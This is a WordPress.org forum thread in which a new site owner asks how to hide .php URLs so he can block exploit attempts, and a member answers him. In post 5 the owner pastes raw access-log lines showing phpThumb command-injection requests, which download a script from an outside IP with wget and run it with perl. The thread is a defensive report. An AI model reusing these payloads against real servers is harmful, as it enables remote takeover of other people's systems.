WordPress.org

Ready to get started?Download WordPress

Forums

Rewrite all URLs with php extension (7 posts)

  1. arachma1
    Member
    Posted 2 years ago #

    Hello Everybody,

    I just played around with the "Permalink" settings and a few URL rewrite plugins (Easy url rewrite, Auto URL, etc.) but none of them fits the one I am looking for.

    Maybe I missed something fundamental, but what I want is to rewrite all URLs containing ".php" including everything on the admin areas. For instance wp-login.php, wp-admin/edit.php, etc., to be login.html, admin/edit.html, etc. How could I easily do that?

    I am aware that I will possibly need to do the rewrite on my Nginx as well. But I don't think there will be an issue as long as I know the URL mappings.

    Thanks in advance for your help.

    Kind regards,

    Anto

  2. Jorge
    Member
    Posted 2 years ago #

  3. arachma1
    Member
    Posted 2 years ago #

    Thanks Jorge,

    But that does not answer my question. As what you pointed out (I think) can easily be achieved using Permalink function.

    Maybe I need to explain in more detail on what I want to achieve.

    My main intention is to block any request for URLs containing ".php", to avoid any possible exploits. For that, there should not be any links on my website containing ".php". So what I need is a function on my WordPress to automatically change those URLs before the page sent to the browser. I can manually change them on every PHP scripts, but then I will have to re-do them on every upgrades.

    Kind regards,

    Anto

  4. Jorge
    Member
    Posted 2 years ago #

    Sorry, I meant, keep it as-is. I wouldn't recommend obfuscating the permalink structure in the wp-admin area.

    Is there a particular exploit or do you know of one that an attacker might use knowing the filetype? If so, the core developers would benefit from knowing any vulnerabilities that present themselves.

  5. arachma1
    Member
    Posted 2 years ago #

    I just have my WordPress running since this morning :) So I don't know the exact vulnerabilities on it. But since I have it running my web server got bombardier with requests like below, which I am quite sure they are not the requests from normal users:

    _|94.23.225.138|-|27/Dec/2011:08:10:41 +0100|GET|/wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9|HTTP/1.1|410|152|-|Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0|-
    _|94.23.225.138|-|27/Dec/2011:08:10:41 +0100|GET|/wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9|HTTP/1.1|410|152|-|Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0|-
    _|94.23.225.138|-|27/Dec/2011:08:10:41 +0100|GET|/wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9|HTTP/1.1|410|152|-|Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0|-

  6. Jorge
    Member
    Posted 2 years ago #

    That looks like an attacker might be trying to exploit the TimThumb.php script in your theme.

    What is the URL of your install?

  7. arachma1
    Member
    Posted 2 years ago #

    Did you mean my site using WordPress? If so, it is http://myweblog.info which is located in a VPS provider some where in Germany. But it only accepts requests from my home IP address at the moment, until I find a good solution to block any requests containing ".php".

Topic Closed

This topic has been closed to new replies.

About this Topic